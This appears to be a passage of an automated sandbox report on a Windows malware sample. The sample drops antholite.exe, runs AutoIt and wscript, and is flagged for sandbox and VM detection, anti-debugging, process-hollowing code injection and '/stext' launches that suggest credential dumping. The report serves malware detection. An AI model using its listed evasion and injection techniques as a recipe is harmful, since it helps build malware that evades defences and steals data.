                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008AF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_008AF98E
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00921C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_00921C41
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_0041CBE1
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040F7E2 Sleep,ExitProcess,2_2_0040F7E2
                  Found API chain indicative of sandbox detection
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98421
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,2_2_0041A7D9
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeWindow / User API: threadDelayed 3000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeWindow / User API: threadDelayed 6504Jump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeAPI coverage: 3.9 %
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeAPI coverage: 7.7 %
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeAPI coverage: 5.6 %
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe TID: 5632Thread sleep count: 233 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe TID: 5632Thread sleep time: -116500s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe TID: 5616Thread sleep count: 3000 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe TID: 5616Thread sleep time: -9000000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe TID: 5616Thread sleep count: 6504 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe TID: 5616Thread sleep time: -19512000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0076DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0076DBBE
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0073C2A2 FindFirstFileExW,0_2_0073C2A2
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007768EE FindFirstFileW,FindClose,0_2_007768EE
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0077698F
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0076D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0076D076
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0076D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0076D3A9
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00779642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00779642
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0077979D
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00779B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00779B2B
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00775C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00775C97
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_0040928E
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_0041C322
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,2_2_0040C388
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_004096A0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,2_2_00408847
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00407877 FindFirstFileW,FindNextFileW,2_2_00407877
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0044E8F9 FindFirstFileExA,2_2_0044E8F9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040BB6B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00419B86
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040BD72
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_008FDBBE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008CC2A2 FindFirstFileExW,2_2_008CC2A2
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_009068EE FindFirstFileW,FindClose,2_2_009068EE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0090698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_0090698F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_008FD076
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_008FD3A9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00909642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00909642
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0090979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0090979D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00909B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00909B2B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00905C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00905C97
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_100010F1
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_10006580 FindFirstFileExA,2_2_10006580
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008CC2A2 FindFirstFileExW,3_2_008CC2A2
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_009068EE FindFirstFileW,FindClose,3_2_009068EE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0090698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_0090698F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_008FD076
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_008FD3A9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00909642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00909642
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0090979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0090979D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_008FDBBE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00909B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00909B2B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00905C97 FindFirstFileW,FindNextFileW,FindClose,3_2_00905C97
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_00407CD2
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007042DE
                  Source: antholite.exe, 00000002.00000003.2142233343.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4550520256.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000003.2141943230.00000000011D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: wscript.exe, 00000006.00000002.2223625474.000001909C4D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: wscript.exe, 00000006.00000002.2223625474.000001909C4D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T}i
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                  Source: antholite.exe, 00000002.00000003.2142233343.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4550520256.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000003.2141943230.00000000011D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: bhvA838.tmp.3.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077EAA2 BlockInput,0_2_0077EAA2
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00732622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00732622
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007042DE
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00724CE8 mov eax, dword ptr fs:[00000030h]0_2_00724CE8
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_025334A0 mov eax, dword ptr fs:[00000030h]0_2_025334A0
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_02533500 mov eax, dword ptr fs:[00000030h]0_2_02533500
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_02531E6E mov eax, dword ptr fs:[00000030h]0_2_02531E6E
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_02531E80 mov eax, dword ptr fs:[00000030h]0_2_02531E80
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00443355 mov eax, dword ptr fs:[00000030h]2_2_00443355
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B4CE8 mov eax, dword ptr fs:[00000030h]2_2_008B4CE8
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_10004AB4 mov eax, dword ptr fs:[00000030h]2_2_10004AB4
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_010F3500 mov eax, dword ptr fs:[00000030h]2_2_010F3500
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_010F34A0 mov eax, dword ptr fs:[00000030h]2_2_010F34A0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_010F1E6E mov eax, dword ptr fs:[00000030h]2_2_010F1E6E
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_010F1E80 mov eax, dword ptr fs:[00000030h]2_2_010F1E80
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B4CE8 mov eax, dword ptr fs:[00000030h]3_2_008B4CE8
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00760B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00760B62
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00732622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00732622
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0072083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0072083F
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007209D5 SetUnhandledExceptionFilter,0_2_007209D5
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00720C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00720C21
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0043503C
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00434A8A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0043BB71
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00434BD8 SetUnhandledExceptionFilter,2_2_00434BD8
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_008C2622
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_008B083F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B09D5 SetUnhandledExceptionFilter,2_2_008B09D5
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_008B0C21
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_100060E2
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_10002639
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_10002B1C
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_008C2622
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_008B083F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B09D5 SetUnhandledExceptionFilter,3_2_008B09D5
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_008B0C21

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,2_2_0041812A
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Cocles\antholite.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Cocles\antholite.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Cocles\antholite.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe2_2_00412132
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00761201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00761201
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00742BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00742BA5
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0076B226 SendInput,keybd_event,0_2_0076B226
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007822DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_007822DA
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\hrwdimdtylblmzmsnycdtxncbowjm"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\sljoieovmttyofawejoeebhlbcosfxea"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\cnoh"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe "C:\Users\user\AppData\Local\Cocles\antholite.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00760B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00760B62
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00761663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00761663
                  Source: Rgh99876k7e.exe, antholite.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: antholite.exeBinary or memory string: Shell_TrayWnd
                  Source: antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager[z
                  Source: antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager-z
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerSM\caW
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerons|
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerSM\j
                  Source: antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager*z
